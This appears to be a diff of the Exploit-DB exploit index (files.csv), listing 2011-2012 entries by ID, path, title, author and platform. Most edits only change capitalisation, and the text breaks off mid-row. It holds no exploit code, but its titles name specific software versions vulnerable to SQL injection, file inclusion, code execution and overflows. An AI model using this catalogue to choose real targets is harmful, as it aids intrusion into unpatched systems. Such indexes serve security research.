17786,platforms/php/webapps/17786.txt,"Webmobo WB News System - Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro - SEH Overwrite",2011-09-06,blake,windows,local,0 -17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 -17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 -17791,platforms/php/webapps/17791.txt,"WordPress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 +17789,platforms/php/webapps/17789.txt,"Wordpress Tweet Old Post plugin 3.2.5 - SQL Injection",2011-09-06,sherl0ck_,php,webapps,0 +17790,platforms/php/webapps/17790.txt,"Wordpress post highlights plugin 2.2 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 +17791,platforms/php/webapps/17791.txt,"Wordpress KNR Author List Widget plugin 2.0.0 - SQL Injection",2011-09-06,"Miroslav Stampar",php,webapps,0 17792,platforms/php/webapps/17792.txt,"PlaySms 0.9.5.2 - Remote File Inclusion",2011-09-06,NoGe,php,webapps,0 -17793,platforms/php/webapps/17793.txt,"WordPress SCORM Cloud plugin 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 -17794,platforms/php/webapps/17794.txt,"WordPress Eventify - Simple Events plugin 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17793,platforms/php/webapps/17793.txt,"Wordpress SCORM Cloud plugin 1.0.6.6 - SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 +17794,platforms/php/webapps/17794.txt,"Wordpress Eventify - Simple Events plugin 1.7.f SQL Injection",2011-09-07,"Miroslav Stampar",php,webapps,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD Exploit (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 -17797,platforms/php/webapps/17797.txt,"WordPress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 -17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17797,platforms/php/webapps/17797.txt,"Wordpress Paid Downloads plugin 2.01 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 +17798,platforms/php/webapps/17798.txt,"Wordpress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0 -17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbiraty File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 +17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbiraty File Upload Exploit (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",php,webapps,0 -17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 -17809,platforms/php/webapps/17809.txt,"WordPress A to Z Category Listing plugin 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17808,platforms/php/webapps/17808.txt,"Wordpress WP-Filebase Download Manager plugin 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 +17809,platforms/php/webapps/17809.txt,"Wordpress A to Z Category Listing plugin 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0 17810,platforms/windows/remote/17810.rb,"BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0 -17814,platforms/php/webapps/17814.txt,"WordPress Event Registration plugin 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 +17814,platforms/php/webapps/17814.txt,"Wordpress Event Registration plugin 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service PoC",2011-09-09,modpr0be,windows,dos,0 -17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 +17816,platforms/php/webapps/17816.txt,"Wordpress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0 @@ -15486,10 +15486,10 @@ id,file,description,date,author,platform,type,port 21785,platforms/windows/dos/21785.pl,"HCView - WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,Metasploit,windows,remote,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection",2011-09-13,sherl0ck_,php,webapps,0 -17828,platforms/php/webapps/17828.txt,"WordPress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 +17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server 1.7 - SQL Injection",2011-09-13,"Miroslav Stampar",php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 -17832,platforms/php/webapps/17832.txt,"WordPress Plugin e-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 +17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce 3.8.6 - SQL Injection",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,Metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15508,25 +15508,25 @@ id,file,description,date,author,platform,type,port 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Arbitrary File Deletion",2011-09-17,LiquidWorm,php,webapps,0 -17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 +17858,platforms/php/webapps/17858.txt,"Wordpress Filedownload Plugin 0.1 - 'download.php' Remote File Disclosure",2011-09-19,Septemb0x,php,webapps,0 17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 - (edit.php) HTTP Response Splitting",2011-09-19,LiquidWorm,php,webapps,0 -17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 +17857,platforms/php/webapps/17857.txt,"Wordpress Count per Day plugin 2.17 - SQL Injection",2011-09-18,"Miroslav Stampar",php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 - .m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory - HMI NETB Request Overflow",2011-09-18,Metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC)",2011-09-18,loneferret,windows,dos,21 -17860,platforms/php/webapps/17860.txt,"WordPress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17861,platforms/php/webapps/17861.txt,"WordPress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17862,platforms/php/webapps/17862.txt,"WordPress WPEasyStats Plugin 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17863,platforms/php/webapps/17863.txt,"WordPress Annonces Plugin 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17864,platforms/php/webapps/17864.txt,"WordPress Livesig Plugin 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17865,platforms/php/webapps/17865.txt,"WordPress Disclosure Policy Plugin 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17866,platforms/php/webapps/17866.txt,"WordPress Mailing List Plugin 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17867,platforms/php/webapps/17867.txt,"WordPress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17868,platforms/php/webapps/17868.txt,"WordPress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17869,platforms/php/webapps/17869.txt,"WordPress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17860,platforms/php/webapps/17860.txt,"Wordpress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17861,platforms/php/webapps/17861.txt,"Wordpress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17862,platforms/php/webapps/17862.txt,"Wordpress WPEasyStats Plugin 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17863,platforms/php/webapps/17863.txt,"Wordpress Annonces Plugin 1.2.0.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17864,platforms/php/webapps/17864.txt,"Wordpress Livesig Plugin 0.4 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17865,platforms/php/webapps/17865.txt,"Wordpress Disclosure Policy Plugin 1.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17866,platforms/php/webapps/17866.txt,"Wordpress Mailing List Plugin 1.3.2 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17867,platforms/php/webapps/17867.txt,"Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17868,platforms/php/webapps/17868.txt,"Wordpress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 +17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0 -17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugin - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0 +17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0 @@ -15539,25 +15539,25 @@ id,file,description,date,author,platform,type,port 17884,platforms/windows/remote/17884.py,"Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow",2011-09-22,mr_me,windows,remote,0 17885,platforms/windows/dos/17885.txt,"sunway forcecontrol 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17886,platforms/windows/remote/17886.py,"FreeFloat FTP Server - Buffer Overflow (DEP Bypass)",2011-09-23,blake,windows,remote,0 -17887,platforms/php/webapps/17887.txt,"WordPress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 -17888,platforms/php/webapps/17888.txt,"WordPress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17887,platforms/php/webapps/17887.txt,"Wordpress Link Library plugin 5.2.1 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 +17888,platforms/php/webapps/17888.txt,"Wordpress AdRotate plugin 3.6.5 - SQL Injection",2011-09-24,"Miroslav Stampar",php,webapps,0 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 17890,platforms/windows/dos/17890.c,"GMER 1.0.15.15641 - MFT Overwrite",2011-09-26,Heurs,windows,dos,0 -17891,platforms/php/webapps/17891.txt,"WordPress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 +17891,platforms/php/webapps/17891.txt,"Wordpress CevherShare Plugin 2.0 - SQL Injection",2011-09-26,bd0rk,php,webapps,0 17892,platforms/windows/local/17892.pl,"Muse Music All-In-One 1.5.0.001 - (.pls) Buffer Overflow (DEP Bypass)",2011-09-26,"C4SS!0 G0M3S",windows,local,0 17893,platforms/windows/local/17893.pl,"GTA SA-MP server.cfg - Local Buffer Overflow",2011-09-26,Silent_Dream,windows,local,0 -17894,platforms/php/webapps/17894.txt,"WordPress Mingle Forum plugin 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 +17894,platforms/php/webapps/17894.txt,"Wordpress Mingle Forum plugin 1.0.31 - SQL Injection",2011-09-27,"Miroslav Stampar",php,webapps,0 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerabilities",2011-09-27,"Sohil Garg",jsp,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System - SQL Injection",2011-09-27,"Indonesian BlackCoder",php,webapps,0 -17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 +17901,platforms/osx/dos/17901.c,"Mac OSX < 10.6.7 - Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Privilege Escalation",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS 07.1.21 - Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17905,platforms/php/webapps/17905.txt,"Typo3 - File Disclosure",2011-09-29,"Number 7",php,webapps,0 -17906,platforms/php/webapps/17906.txt,"WordPress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 +17906,platforms/php/webapps/17906.txt,"Wordpress Plugin Bannerize 2.8.7 - SQL Injection",2011-09-30,"Miroslav Stampar",php,webapps,0 17908,platforms/freebsd/dos/17908.sh,"FreeBSD - UIPC socket heap Overflow PoC",2011-09-30,"Shaun Colley",freebsd,dos,0 17909,platforms/php/webapps/17909.txt,"MARINET CMS - 'room.php' Blind SQL Injection",2011-09-30,"BHG Security Center",php,webapps,0 17911,platforms/php/webapps/17911.php,"Feed on Feeds 0.5 - Remote PHP Code Injection Exploit",2011-09-30,EgiX,php,webapps,0 @@ -15582,7 +15582,7 @@ id,file,description,date,author,platform,type,port 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass",2011-10-07,modpr0be,windows,local,0 -17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 +17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0 @@ -15594,9 +15594,9 @@ id,file,description,date,author,platform,type,port 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds - Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection",2011-10-10,"Stefan Schurtz",php,webapps,0 -17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 +17970,platforms/php/webapps/17970.txt,"WP-SpamFree Wordpress Spam Plugin - SQL Injection",2011-10-11,cheki,php,webapps,0 17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection",2011-10-12,Mario_Vs,php,webapps,0 -17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 +17973,platforms/php/webapps/17973.txt,"Wordpress GD Star Rating plugin 1.9.10 - SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs - Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 @@ -15616,14 +15616,14 @@ id,file,description,date,author,platform,type,port 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (2)",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0 -17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 +17980,platforms/php/webapps/17980.txt,"Wordpress Contact Form plugin 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0 17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - .zap file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0 -17983,platforms/php/webapps/17983.txt,"WordPress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 +17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus 4.1.1 - SQL Injection",2011-10-15,Skraps,php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow",2011-10-16,Metasploit,windows,local,0 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - file:// Arbitrary Code Execution",2011-10-17,Metasploit,osx,remote,0 -17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 +17987,platforms/php/webapps/17987.txt,"Wordpress BackWPUp Plugin 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation",2011-10-18,Metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0 @@ -15673,7 +15673,7 @@ id,file,description,date,author,platform,type,port 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 - (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,Metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,Metasploit,windows,local,0 -18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 +18039,platforms/php/webapps/18039.txt,"Wordpress wptouch plugin - SQL Injection",2011-10-27,longrifle0x,php,webapps,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 @@ -15681,8 +15681,8 @@ id,file,description,date,author,platform,type,port 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 18051,platforms/windows/remote/18051.txt,"BroadWin WebAccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC",2011-10-31,rgod,windows,dos,0 -18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 -18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 +18053,platforms/php/webapps/18053.txt,"Wordpress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0 +18055,platforms/php/webapps/18055.txt,"Wordpress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0 18058,platforms/php/webapps/18058.txt,"Joomla Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0 @@ -15705,7 +15705,7 @@ id,file,description,date,author,platform,type,port 18080,platforms/linux/local/18080.c,"Linux Kernel 2.6.37-rc1 - serial_multiport_struct Local Information Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (3)",2011-11-04,Metasploit,windows,local,0 -18083,platforms/php/webapps/18083.php,"Zenphoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 +18083,platforms/php/webapps/18083.php,"ZenPhoto 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"phpMyFAQ 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Privilege Escalation",2011-11-05,zx2c4,linux,local,0 @@ -15730,11 +15730,11 @@ id,file,description,date,author,platform,type,port 18110,platforms/php/webapps/18110.txt,"Mambo CMS 4.x - (Zorder) SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80 -18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 +18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 18132,platforms/php/webapps/18132.php,"Support Incident Tracker 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"optima apiftp server 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 -18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 +18114,platforms/php/webapps/18114.txt,"Wordpress AdRotate plugin 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 @@ -15744,8 +15744,8 @@ id,file,description,date,author,platform,type,port 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS 